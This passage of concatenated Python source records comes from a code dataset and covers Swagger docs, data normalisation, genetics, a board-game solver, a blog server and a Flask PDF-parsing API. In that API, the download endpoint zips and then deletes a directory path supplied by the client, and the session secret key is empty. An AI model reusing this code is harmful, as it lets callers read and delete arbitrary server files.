[]\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_sweetheart.py","file_name":"_sweetheart.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"355708478","text":"import functools\nfrom collections import defaultdict\nfrom typing import Dict, Optional, Union\n\nimport yaml\nfrom aiohttp import web\nfrom aiohttp.abc import AbstractView\nfrom openapi_spec_validator import validate_v3_spec\n\nfrom .routes import _SWAGGER_SPECIFICATION\nfrom .swagger import Swagger\nfrom .swagger_route import SwaggerRoute\n\ntry:\n from aiohttp.web_urldispatcher import _ExpectHandler, _WebHandler\nexcept ImportError:\n _ExpectHandler, _WebHandler = None, None\n\n\nclass SwaggerDocs(Swagger):\n def __init__(\n self,\n app: web.Application,\n ui_path: str,\n *,\n request_key: str = \"data\",\n title: str = \"OpenAPI3\",\n version: str = \"1.0.0\",\n description: Optional[str] = None,\n components: Optional[str] = None,\n ) -> None:\n spec: Dict = {\n \"openapi\": \"3.0.0\",\n \"info\": {\"title\": title, \"version\": version},\n \"paths\": defaultdict(lambda: defaultdict(dict)),\n }\n if description is not None:\n spec[\"info\"][\"description\"] = description\n\n if components:\n with open(components) as f:\n spec.update(yaml.safe_load(f))\n\n 
super().__init__(app, ui_path, spec, request_key)\n\n def add_route(\n self,\n method: str,\n path: str,\n handler: Union[_WebHandler, AbstractView],\n *,\n name: Optional[str] = None,\n expect_handler: Optional[_ExpectHandler] = None,\n ) -> web.AbstractRoute:\n if handler.__doc__ and \"---\" in handler.__doc__:\n *_, spec = handler.__doc__.split(\"---\")\n method_spec = yaml.safe_load(spec)\n method_lower = method.lower()\n self.spec[\"paths\"][path][method_lower] = method_spec\n validate_v3_spec(self.spec)\n route = SwaggerRoute(method_lower, path, handler, swagger=self)\n self._app[_SWAGGER_SPECIFICATION] = self.spec\n handler = functools.partial(self._handle_swagger_call, route)\n\n return self._app.router.add_route(\n method, path, handler, name=name, expect_handler=expect_handler\n )\n","sub_path":"aiohttp_swagger3/swagger_docs.py","file_name":"swagger_docs.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"568671751","text":"import numpy as np\nimport logging\n\nfrom tqdm import tqdm\nfrom typing import Tuple, Optional\n\nfrom landshark import iteration\nfrom landshark.basetypes import OrdinalArraySource, Worker, OrdinalType\nfrom landshark.util import to_masked\n\nlog = logging.getLogger(__name__)\n\n\nclass StatCounter:\n \"\"\"Class that computes online mean and variance.\"\"\"\n def __init__(self, n_features: int) -> None:\n \"\"\"Initialise the counters.\"\"\"\n self._mean = np.zeros(n_features)\n self._m2 = np.zeros(n_features)\n self._n = np.zeros(n_features, dtype=int)\n\n def update(self, array: np.ma.MaskedArray) -> None:\n \"\"\"Update calclulations with new data.\"\"\"\n assert array.ndim == 2\n assert array.shape[0] > 1\n\n new_n = np.ma.count(array, axis=0)\n new_mean = (np.ma.mean(array, axis=0)).data\n new_mean[new_n == 0] = 0. 
# enforce this condition\n new_m2 = (np.ma.var(array, axis=0, ddof=0) * new_n).data\n\n add_n = new_n + self._n\n if any(add_n == 0): # catch any totally masked images\n add_n[add_n == 0] = 1\n\n delta = new_mean - self._mean\n delta_mean = delta * (new_n / add_n)\n\n self._mean += delta_mean\n self._m2 += new_m2 + (delta * self._n * delta_mean)\n self._n += new_n\n\n @property\n def mean(self) -> np.ndarray:\n \"\"\"Get the current estimate of the mean.\"\"\"\n assert np.all(self._n > 1)\n return self._mean\n\n @property\n def variance(self) -> np.ndarray:\n \"\"\"Get the current estimate of the variance.\"\"\"\n assert np.all(self._n > 1)\n var = self._m2 / self._n\n return var\n\n @property\n def count(self) -> np.ndarray:\n \"\"\"Get the count of each feature.\"\"\"\n return self._n\n\n\nclass Normaliser(Worker):\n\n def __init__(self, mean: np.ndarray, var: np.ndarray,\n missing: Optional[OrdinalType]) -> None:\n self._mean = mean\n self._std = np.sqrt(var)\n self._missing = missing\n\n def __call__(self, x: np.ndarray) -> np.ndarray:\n xm = to_masked(x, self._missing)\n xm -= self._mean\n xm /= self._std\n return xm.data\n\n\ndef get_stats(src: OrdinalArraySource, batchsize: int) \\\n -> Tuple[np.ndarray, np.ndarray]:\n log.info(\"Computing ordinal feature statistics\")\n n_rows = src.shape[0]\n n_cols = src.shape[-1]\n stats = StatCounter(n_cols)\n with tqdm(total=n_rows) as pbar:\n with src:\n for s in iteration.batch_slices(batchsize, n_rows):\n x = src(s)\n bs = x.reshape((-1, x.shape[-1]))\n bm = to_masked(bs, src.missing)\n stats.update(bm)\n pbar.update(x.shape[0])\n mean, variance = stats.mean, stats.variance\n return mean, variance\n","sub_path":"landshark/normalise.py","file_name":"normalise.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"71515268","text":"#!/usr/bin/env spcli\n\n# Hidayat Trimarsanto \n#\n# create an He file with the following format:\n# dHe He POP1 POP2 POP3 ...\n\n\nfrom seqpy import cout, cerr\nfrom seqpy.cmds import arg_parser\nfrom seqpy.core.bioio import tabparser\n\nimport allel\nimport numpy as np\nfrom itertools import combinations\n\ndef init_argparser(p=None):\n\n p = tabparser.init_argparser()\n p.add_argument('-o', '--outfile', default='outfile.dist.txt')\n\n return p\n\n\ndef main( args ):\n\n geno2dist( args )\n\n\ndef geno2dist( args ):\n\n lineparser = tabparser.GenotypeLineParser( args )\n lineparser.set_translator(lineparser.haploid_translator)\n\n # read whole genotype, and release all unused memory\n cerr('I: reading genotype file')\n haplotypes = lineparser.parse_haplotypes()\n\n cerr('I: calculating pairwise dxy')\n distm = pairwise_dxy( haplotypes )\n\n cerr('I: writing to outfile')\n with open(args.outfile, 'wb') as outfile:\n outfile.write( lineparser.get_sample_header(True) )\n outfile.write( b'\\n')\n\n # write the matrix\n np.savetxt(outfile, distm, delimiter='\\t', fmt='%.6f')\n\n\n\ndef pairwise_dxy(haplotypes):\n\n n = len(haplotypes)\n distm = np.zeros((n,n))\n idxs = list(range(len(haplotypes[0])))\n\n for i,j in combinations( range(n), 2):\n cerr('I: pairwising %d - %d' % (i,j))\n x = haplotypes[i]\n y = haplotypes[j]\n d = 0\n c = 0\n for idx in idxs:\n xi = x[idx]\n yi = y[idx]\n if xi == b'-' or yi == b'-': continue\n if xi != yi: d += 1\n c += 1\n distm[i,j] = distm[j,i] = d/c\n\n return 
distm\n\n\n","sub_path":"wgs/geno2dist.py","file_name":"geno2dist.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638368601","text":"import numpy as np\nimport copy\nimport time\n\n# The dictionary of chutes and ladders. \nchutes_ladders = {1: 38, 4: 14, 16: 6, 9: 31, 21: 42, 28: 84, 36: 44, 51: 67, 71: 91, 80: 100, 98: 78, 95: 75, 93: 73, 87: 24, 64: 60, 62: 19, 56: 53, 49: 11, 48: 26}\ncd_list = list(chutes_ladders.keys())\n# Vector to solve for our result later\nb = np.ones(101)\nb[100] = 0\n# Dictionary of dice: each key is a face value and its value is that face's probability\nblack = {4:2/3, 0:1/3}\nred = {6:1/3, 2:2/3}\ngreen = {5:1/2, 1:1/2}\nblue = {3:1}\n\ndef row_calculator(board, square_no, dice):\n faces = list(dice.keys())\n # the blue die has only one face value, so it gets a dedicated branch\n # since these terms are moved to the left-hand side of the equation, the transition\n # probabilities are subtracted at the corresponding entries of the matrix\n if dice == blue:\n f1 = faces[0]\n p1 = dice[f1]\n if square_no + 3 < 100:\n if square_no + f1 in cd_list:\n board[square_no][chutes_ladders[square_no + f1]] -= p1\n else:\n board[square_no][square_no + f1] -= p1\n else:\n board[square_no][100] = -1\n # for the other dice\n else:\n #get the face values and their probabilities\n f1 = faces[0]\n f2 = faces[1]\n p1 = dice[f1]\n p2 = dice[f2]\n #algorithm\n if square_no + f1 < 100:\n if square_no+ f1 in cd_list:\n board[square_no][chutes_ladders[square_no+f1]] -= p1\n else:\n board[square_no][square_no+f1] -= p1\n if square_no+f2 in cd_list:\n board[square_no][chutes_ladders[square_no+f2]] -= p2\n else:\n board[square_no][square_no+f2] -= p2\n elif square_no + f2 < 100:\n board[square_no][100] = -p1\n if square_no + f2 in cd_list:\n board[square_no][chutes_ladders[square_no + f2]] -= p2\n else:\n board[square_no][square_no + f2] -= p2\n else:\n board[square_no][100] = -1\n\ndef update(board, square_no, dice):\n #initialize the value of the square to be 1\n board[square_no][square_no] = 1\n if square_no == 100:\n return\n #run the calculation based on the picked dice. 0 denotes black, 1 denotes red, 2 denotes green, and 3 denotes blue\n if dice == 0:\n row_calculator(board, square_no, black)\n if dice == 1:\n row_calculator(board, square_no, red)\n if dice == 2:\n row_calculator(board, square_no, green)\n if dice == 3:\n row_calculator(board, square_no, blue)\n\ndef number_of_moves(board, policy):\n #update the board\n for i in range(101):\n update(board, i, policy[i])\n try:\n x = np.linalg.solve(board, b)\n return x\n # since we cannot use the blue die on square 53 (which leads to an infinite loop), the matrix row for 53 \n #created by the blue die contains all 0,\n # which leads to a singular matrix that cannot be solved. 
Return a valid value when an error is reached.\n except np.linalg.LinAlgError as err:\n if 'Singular matrix' in str(err):\n return [float('inf')]\n\ndef update_policy(policy, x):\n #check if the new policy makes the x value smaller\n #compute bottom up\n for i in range(99, -1, -1):\n for j in range(4):\n new_board = np.zeros((101, 101))\n policy_new = copy.deepcopy(policy)\n policy_new[i] = j\n x_matrix = number_of_moves(new_board, policy_new)\n x2 = x_matrix[0]\n #if new policy improve optimal moves, get new policy and optimal moves\n if x2 < x:\n policy[i] = j\n x = x2\n return policy, x\n\ndef main():\n start = time.time()\n #use the green dice as the first set of policy, tests showing that initialize a all green dice policy results in best value\n policy = [2 for i in range(101)]\n moves = float('inf')\n #number of trials\n trials = 1\n policy_old = copy.deepcopy(policy)\n policy, moves = update_policy(policy, moves)\n while policy_old != policy:\n policy_old = copy.deepcopy(policy)\n policy, moves = update_policy(policy, moves)\n trials += 1\n end = time.time()\n time_run = end - start\n print(\"Optimal Average Number of Moves Expected to Complete the Game: \",moves)\n print(f\"Execution time of the program is {time_run} seconds with {trials} trials.\")\n print(\"Final Policy, with 0 denotes black, 1 denotes red, 2 denotes green, and 3 denotes blue \\n\", policy)\n return 0\n\nmain()","sub_path":"ChutesandLadders.py","file_name":"ChutesandLadders.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"295581190","text":"import logging;logging.basicConfig(level=logging.INFO)\nimport asyncio,os,json,time\nfrom datetime import datetime\nfrom aiohttp import web\nfrom jinja2 import Environment,FileSystemLoader\nimport www.orm\nfrom www.coroweb import add_routes,add_static\ndef init_jinja2(app,**kw):\n logging.info('init jinja2...')\n options = dict(\n autoescape = kw.get('autoescape',True),\n block_start_string = kw.get('block_start_string','{%'),\n block_end_string = kw.get('block_end_string','%}'),\n variable_start_string = kw.get('variable_start_string','{{'),\n variable_end_string = kw.get('variable_end_string','}}'),\n auto_reload = kw.get('auto_reload',True)\n )\n path = kw.get('path',None)\n if path is None:\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)),'templates')\n logging.info('set jinja2 template path:%s' % path)\n env = Environment(loader=FileSystemLoader(path),**options)\n filters = (kw.get('filters',None))\n if filters is not None:\n for name,f in filters.items():\n env.filters[name] = f\n app['__templating__'] = env\n\n# @get('/')\n# def index(request):\n# summary = 'Lorem ipsum dolor sit amet,consectetur adipisicing elit,sed do eiusmod tempor incididuntut labore et dolore magna aliqua'\n# blogs = [\n# Blog(id='1',name='Test Blog',summary=summary,create_at=time.time()-120),\n# Blog(id='2',name='Something New',summary=summary,create_at=time.time()-3600),\n# Blog(id='3',name='Learn Swift',summary=summary,create_at=time.time()-7200)\n# ]\n# return {\n# '__template__': 'blogs.html',\n# 'blogs': blogs\n# }\n\nasync def logger_factory(app,handler):\n async def logger(request):\n logging.info('Request:%s %s' % (request.method,request.path))\n return (await handler(request))\n return logger\nasync def data_factory(app,handler):\n async def parse_data(request):\n if request.method == 'POST':\n if request.content_type.startswith('application/json'):\n request.__data__ = 
await request.json()\n logging.info('request json:%s' % str(request.__data__))\n elif request.content_type.startswith('application/x-www-form-urlencoded'):\n request.__data__ = await request.post()\n logging.info('request form:%s' % str(request.__data__))\n return (await handler(request))\n return parse_data\nasync def reponse_factory(app,handler):\n async def response(request):\n logging.info('Response handler...')\n r = await handler(request)\n if isinstance(r,web.StreamResponse):\n return r\n if isinstance(r,bytes):\n resp = web.Response(body=r)\n resp.content_type = 'application/octet-stream'\n return resp\n if isinstance(r,str):\n if r.startswith('redirect:'):\n return web.HTTPFound(r[9:])\n resp = web.Response(body=r.encode('utf-8'))\n resp.content_type = 'text/html;charset=utf-8'\n return resp\n if isinstance(r,dict):\n template = r.get('__template__')\n if template is None:\n resp = web.Response(body=json.dumps(r,ensure_ascii=False,default=lambda o:o.__dict__).encode('utf-8'))\n resp.content_type = 'application/json;charset=utf-8'\n return resp\n else:\n resp = web.Response(body=app['__templating__'].get_template(template).render(**r).encode('utf-8'))\n resp.content_type = 'text/html;charset=utf-8'\n return resp\n if isinstance(r,int) and r >=100 and r < 600:\n return web.Response(r)\n if isinstance(r,tuple) and len(r) == 2:\n t,m = r\n if isinstance(t,int) and t >= 100 and t < 600:\n return web.Response(t,str(m))\n resp = web.Response(body=str(r).encode('utf-8'))\n resp.content_type = 'text/plain;charset=utf-8'\n return resp\n return response\ndef datetime_filter(t):\n delta = int(time.time() - t)\n if delta < 60:\n return u'one min ago'\n if delta < 3600:\n return u'%s min ago' % (delta // 60)\n if delta < 86400:\n return u'%s hour ago' % (delta // 3600)\n if delta < 604800:\n return u'%s day ago' % (delta // 86400)\n dt = datetime.fromtimestamp(t)\n return u'%s year %s month %s day' % (dt.year,dt.month,dt.day)\n# def index(request):\n# return web.Response(body=b'<h1>Awesome</h1>
',content_type='text/html')\nasync def init(loop):\n await www.orm.create_pool(loop=loop,host='127.0.0.1',port=3306,user='www',password='www',db='awesome')\n app = web.Application(loop=loop,middlewares=[\n logger_factory,reponse_factory\n ])\n init_jinja2(app,filters=dict(datetime=datetime_filter))\n add_routes(app,'handlers')\n add_static(app)\n srv = await loop.create_server(app.make_handler(),'127.0.0.1',9000)\n logging.info('server started at http://127.0.0.1:9000..')\n return srv\nloop = asyncio.get_event_loop()\nloop.run_until_complete(init(loop))\nloop.run_forever()","sub_path":"www/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"418665123","text":"\"\"\"\nFlask API for BDMParse's Angular frontend to communicate with to perform \ndocument functions, login functions, and administrative functions\n\"\"\"\n\n\nimport os, json\nfrom flask import Flask, request, send_file, session, redirect, url_for, abort\nfrom flask_cors import CORS, cross_origin\nfrom doc_splitter import doc_splitter\nimport tempfile\nimport shutil\nimport zipfile\nimport io\nfrom werkzeug.utils import secure_filename\nfrom cas import CASClient\nimport db\nimport banner\nfrom doc_map import map_document_type\nfrom config import VIRTUAL_MACHINE_HOSTNAME\n\n\napp = Flask(__name__)\nCORS(app, expose_headers=[\"x-suggested-filename\"])\n\nALLOWED_EXTENSIONS = {'pdf'}\n\napp.secret_key = ''\n\ncas_client = CASClient(\n version=2,\n service_url= VIRTUAL_MACHINE_HOSTNAME + '/redirecting',\n server_url='https://login.vt.edu/profile/cas/login'\n)\n\ndef allowed_file(filename):\n \"\"\"Checks if the filename provided by the front-end is .pdf file\n \n Parameters\n ----------\n filename : str\n A string containing the filename of the file to be parsed\n \n Returns\n -------\n bool\n True if filename is a .pdf filename, false otherwise\n\n \"\"\"\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef is_admin():\n \"\"\"Checks whether current user accessing the API has admin privileges\n\n Returns\n -------\n bool\n True if user has admin privileges, false otherwise\n\n \"\"\"\n print(\"In is_admin()\")\n if is_logged_in() > 0: #Don't bother checking if not logged in\n #Check if user has admin privledges (>0)\n return True\n return False\n\n\ndef is_logged_in():\n \"\"\"Checks whether user accessing the API is currently logged in\n\n Returns\n -------\n int\n User's role level with 0 being standard user, 1 being admin user if user\n is logged in, -1 otherwise to indicate not logged in.\n\n \"\"\"\n #See if in session and get username\n print(\"In is_logged_in()\")\n\n if 'username' in session:\n print(\"In is_logged_in() if statement\")\n #See if valid username by checking each valid username w/ sessions username\n x = db.call_validate_user(session[\"username\"])\n if len(x) > 0:\n print(\"is_logged_in() found valid user\")\n return x[3]\n else:\n session.pop('username', None)\n print(\"is_logged_in() found invalid user\")\n return -1\n\n\ndef is_valid_user(username):\n \"\"\"Checks if username is a valid user of the web application\n\n Queries the database to determine if information exists for the username\n specified\n\n Parameters\n ----------\n username : str\n String of the username to check for existence in the database \n \n Returns\n -------\n bool\n True if information for the user exists, false otherwise\n\n \"\"\"\n x = db.call_validate_user(username)\n if len(x) == 0:\n return False\n else:\n return True\n\n\n@app.route('/api/getuser')\ndef user_json():\n \"\"\"Builds a JSON of the requested user information\n \n Note\n ----\n The GET request should contain the username in the query parameters as ```username```\n\n Returns\n -------\n JSON object\n A JSON object with the following format:\n\n {\n 'username': username,\n 'id': id according to the database,\n 'role': Either admin or standard depending on the users database \n level,\n 'college': College the user belongs to,\n 'documentTypes': List of document types for that specific \n college,\n 'userList': List of users belonging to that college for admin \n functions,\n 'termCodes': List of term codes for that specific college\n }\n \n \"\"\"\n \n # Ensure user is logged in\n if is_logged_in() < 0:\n return 'User not logged in', 401\n \n #loop through all users to find the user\n username = request.args.get('username')\n\n x = db.call_validate_user(username)\n\n #return an empty json if user not in database\n if len(x) == 0:\n return json.dumps({\n 'username':None,\n 'id':None,\n 'role':None,\n 'college':None,\n 'documentTypes':None,\n 'userList':None,\n 'termCodes':None\n }), 200, {'ContentType':'application/json'}\n else:\n #get all the other needed info\n #Check privilege level\n role = 'standard'\n userList = None\n if x[3] >= 1:\n role = 'admin'\n userList = [\n {\n 'id': user[0],\n 'username': user[1],\n 'role': 'standard' if user[2] == 0 else 'admin'\n } for user in db.call_get_users_by_college(x[2])]\n documentTypes = [\n {\n 'id': document[0],\n 'documentType': document[1]\n } for document in db.call_doc_types_by_college(x[2])]\n termCodes = [\n {\n 'id': code[0],\n 'termCode': code[1]\n } for code in db.call_get_term_codes_by_college(x[2])]\n return json.dumps({\n 'username':username,\n 'id':x[0],\n 'role':role,\n 'roleString':role,\n 'college':x[2],\n 'documentTypes': documentTypes,\n 'userList':userList,\n 'termCodes': 
termCodes\n }), 200, {'ContentType':'application/json'}\n\n\n@app.route('/api/file/upload', methods=['POST'])\ndef parse():\n \"\"\"Parses an uploaded bulk PDF file into separate PDFs based on PID\n\n Note\n ----\n The POST request should contain multipart form data consisting of a file\n with key ```fileKey``` and arguments for ```documentType``` and ```termCode```\n\n Returns\n -------\n JSON object\n Upon success the JSON object will be formatted as follows:\n\n {\n 'total': The number of parsed PDFs,\n 'num_success': The number of PDFs successfully uploaded to \n Banner,\n 'num_error': The number of erroneous PIDs according to Banner,\n 'successes': List of successful PIDs,\n 'errors': List of erroneous PIDs,\n 'file_path': String of file path containing erroneous pdfs for \n later download\n }\n \n str\n If the user is not logged in, a 403 code will be sent. \n If the provided document type, term code, or file type are invalid a 500 code will be sent with an appropriate message\n \n \"\"\"\n # Ensure user is logged in\n if is_logged_in() < 0:\n return 'User not logged in', 401\n\n if request.method == 'POST':\n\n file = request.files['fileKey']\n print('upload starting')\n print(request.get_json())\n print(request)\n\n document_type = map_document_type(request.args.get('documentType'))\n print(document_type)\n term_code = request.args.get('termCode')\n print(term_code)\n \n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n\n file_path = None\n\n # Make temporary directory\n with tempfile.TemporaryDirectory() as tempdirname:\n # Store pdf into temporary directory\n file.save(os.path.join(tempdirname, filename))\n\n # Call doc_splitter()\n output_directory = doc_splitter(os.path.join(tempdirname, filename)) \n success, error, result = banner.bulk_upload(output_directory, document_type, term_code)\n \n if result == 'Invalid Term Code':\n return 'Invalid Term Code', 500\n elif result == 'Invalid Document Type':\n return \"Invalid Document Type\", 500\n\n if len(error) == 0:\n shutil.rmtree(output_directory)\n else:\n file_path = output_directory\n\n return json.dumps({\n 'total': len(success) + len(error),\n 'num_success': len(success),\n 'num_error': len(error),\n 'successes': [str(id_number) for id_number in success],\n 'errors': [str(id_number) for id_number in error],\n 'file_path': file_path\n })\n \n else:\n return 'Invalid File Type', 500\n\n\n@app.route('/api/file/download', methods=['POST'])\ndef zip_error_files():\n \"\"\"Zips erroneous PID PDFs into a zipfile to be downloaded by the front-end\n\n Note\n ----\n The POST requests should contain parameters passed along in the format:\n\n {\n 'params': {\n 'file_path': String of directory containing erroneous files\n }\n }\n \n Returns\n -------\n zipfile\n A zipfile containing the parsed erroneous PDFs\n \n \"\"\"\n # Ensure user is logged in\n if is_logged_in() < 0:\n return 'User not logged in', 401\n \n # Obtain file path from request params\n file_directory = request.get_json()['params']['file_path']\n\n # Create temporary data in memory for zipfile\n data = io.BytesIO()\n\n with zipfile.ZipFile(data, mode='w') as z:\n for f_name in os.listdir(file_directory):\n print(os.path.join(file_directory, f_name))\n z.write(os.path.join(file_directory, f_name), arcname=f_name)\n \n data.seek(0)\n\n # Remove erroneous files off VM and remove temporary directory containing\n # them\n shutil.rmtree(file_directory)\n\n # Return zip file of parsed PDFs\n result = send_file(data, 
mimetype='application/zip', attachment_filename=\"parsed.zip\", as_attachment=True)\n\n result.headers[\"x-suggested-filename\"] = \"parsed.zip\"\n return result\n\n\n@app.route('/api/login')\ndef login():\n \"\"\"Ensures user is logged in and then redirects to parsing page OR redirects\n to CAS for login if not already logged in before CAS redirects here to check \n again\n\n Note\n ----\n The GET request should containing the following arguments\n\n 'next'\n The link to redirect to after CAS login\n 'ticket'\n The ticket provided by CAS login\n\n Returns\n -------\n str\n CAS login URL if the user is not logged in yet, username if the user\n is logged in, empty string if the user is invalid\n\n \"\"\"\n print('attempting login')\n print(session)\n #Check if user already logged in\n if'username' in session: #Can then compare username to database\n # Already logged in\n username = session['username']\n # session.pop('username', None) #DEBUGGING ONLY\n if is_valid_user(username):\n print(\"valid user w/ session\")\n return username\n else:\n print(\"invalid user w/ session\")\n session.pop('username', None)\n return VIRTUAL_MACHINE_HOSTNAME + '/login'\n\n #Not already logged in\n next = request.args.get('next')\n ticket = request.args.get('ticket')\n print('The ticket is', ticket)\n if not ticket:\n # No ticket, the request comes from user, send to CAS login\n cas_login_url = cas_client.get_login_url() # generates login URL w/ return page\n return cas_login_url\n\n #There is a ticket, the request come from CAS as callback\n #need to call 'verify_ticket()' to validate ticket and get user profile\n user, attributes, pgtiou = cas_client.verify_ticket(ticket)\n \n\n if not user:\n print(\"No user\")\n session.pop('username', None)\n return VIRTUAL_MACHINE_HOSTNAME + '/login'\n else: # Login successfully, redirect according 'next' query parameter\n session['username'] = user\n print(user)\n if is_valid_user(user):\n print(\"New session w/ valid user\")\n return user\n else:\n print(\"New session w/ invalid user\")\n session.pop('username', None)\n return ''\n\n\n@app.route('/api/logout')\ndef logout():\n \"\"\"Forms call to CAS to logout and then performs call and will lead to \n logout_callback\n\n Returns\n -------\n str\n The logout url to send the user to for logging out of CAS\n \n \"\"\"\n print(\"Logging Out\")\n print(\"Session was:\", session)\n session.pop('username', None)\n print(\"Session now:\", session)\n redirect_url = url_for('login', _external=True) #generates URL for endpoint after logout\n cas_logout_url = cas_client.get_logout_url() #gives CAS the URL for redirecting\n print(\"Redirect to\", redirect_url, \"after CAS logout using\", cas_logout_url)\n return cas_logout_url # sends user to CAS logout which will return to endpoint\n\n\n@app.route('/api/admin/addtype', methods=['POST'])\ndef add_type():\n \"\"\"Adds a document type to the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'documentType': String of the new document type to be added,\n 'collegeName': College to add the document type to\n }\n\n Aborts with a 403 error code if the user is not an admin. 
This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n str\n The unique database ID of the newly added document type\n\n \"\"\"\n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n\n tid = db.call_insert_document_type(request.get_json()['documentType'], request.get_json()['collegeName'])\n print(request.get_json())\n return str(tid)\n\n\n@app.route('/api/admin/adduser', methods=['POST'])\ndef add_user():\n \"\"\"Adds a new user based on their VT username to the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'role': 'admin' if to be added with admin priveleges, else 'standard',\n 'username': VT username of user to be added,\n 'college': College the new user belongs to\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n str\n The unique database ID of the newly added user\n\n \"\"\"\n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n privilege_level = 0\n \n if request.get_json()['role'] == 'admin':\n privilege_level = 1\n\n uid = db.call_insert_user(request.get_json()['username'], privilege_level, request.get_json()['college'])\n print(request.get_json())\n return str(uid)\n\n@app.route('/api/admin/addterm', methods=['POST'])\ndef add_term():\n \"\"\"Adds a new term code to the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'termCode': String of the new term code to be added,\n 'collegeName': College list to add the term code to\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n str\n The unique database ID of the newly added term code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n tid = db.call_insert_term_code(request.get_json()['termCode'], request.get_json()['collegeName'])\n print(request.get_json())\n return str(tid)\n\n@app.route('/api/admin/changerole', methods=['POST'])\ndef change_role():\n \"\"\"Changes the role level of the user specified in the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'role': New role to set the user to,\n 'user': VT username of the user to change\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object with ```success: True``` and a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n print(request.get_json())\n\n role = request.get_json()['params']['role']\n level = 0\n\n if role == 'admin':\n level = 1\n\n db.call_change_user_privilege_level(request.get_json()['params']['user'], level)\n print(request.get_json())\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'}\n\n@app.route('/api/admin/removetype', methods=['POST'])\ndef remove_type():\n \"\"\"Deletes a document type from the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'id': Unique database ID of the document type,\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. 
This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object indicating successful deletion with a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n db.call_delete_document_type(int(request.get_json()['params']['id']))\n print(request.get_json())\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'}\n\n@app.route('/api/admin/removeuser', methods=['POST'])\ndef remove_user():\n \"\"\"Deletes a user from the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'id': Unique database ID of the user,\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object indicating successful deletion with a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n db.call_delete_user(int(request.get_json()['params']['id']))\n print(request.get_json())\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'}\n\n@app.route('/api/admin/removeterm', methods=['POST'])\ndef remove_term():\n \"\"\"Deletes a term code from the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'id': Unique database ID of the term code,\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object indicating successful deletion with a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n db.call_delete_term_code(int(request.get_json()['params']['id']))\n print(request.get_json())\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'}\n","sub_path":"back-end/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":19269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465650203","text":"# Write a NumPy program to compute the histogram of nums against the bins. Label your x-axis with nums and y-axis\n# with bins. 
